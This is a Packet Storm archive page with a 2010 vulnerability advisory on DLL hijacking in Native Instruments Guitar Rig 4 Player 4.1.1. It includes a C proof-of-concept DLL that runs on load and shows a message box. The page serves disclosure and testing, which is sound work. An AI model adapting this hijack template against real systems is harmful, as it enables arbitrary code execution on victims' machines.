exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Native Instruments Guitar Rig 4 Player 4.1.1 Insecure Library Loading

Native Instruments Guitar Rig 4 Player 4.1.1 Insecure Library Loading
Posted Nov 20, 2010
Authored by LiquidWorm | Site zeroscience.mk

Native Instruments Guitar Rig 4 Player version 4.1.1 suffers from an insecure library loading vulnerability.

tags | exploit
SHA-256 | bdded2d22da6096b332e47ea680a264ff3ab72052df535b4c74b151367ea260c

Native Instruments Guitar Rig 4 Player 4.1.1 Insecure Library Loading

Change Mirror Download
/*

Native Instruments Guitar Rig 4 Player v4.1.1 Insecure Library Loading Vulnerability


Vendor: Native Instruments GmbH
Product web page: http://www.native-instruments.com
Affected version: 4.1.1.1845 (Standalone)

Summary: GUITAR RIG 4 PLAYER is the free, modular and expandable effects processor
from Native Instruments, combining creative effects routing possibilities with
ease-of-use and pristine sound quality. The included FACTORY SELECTION library
provides one stunning Amp emulation with Matched Cabinet, plus 20 effects and sound
modifiers to shape and enhance any audio signal.

Desc: Guitar Rig 4 Player suffers from a DLL hijacking vulnerability, which could be
exploited by remote attackers to compromise a vulnerable system. This issue is
caused due to the application insecurely loading certain libraries ("libjack.dll")
from the current working directory, which could allow attackers to execute arbitrary
code by tricking a user into opening specific related files (.nkm and .nkp) from a
network share.

Tested on: Microsoft Windows XP Professional SP3 (English)

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com

Zero Science Lab - http://www.zeroscience.mk

Advisory ID: ZSL-2010-4973
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4973.php

06.11.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    19 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close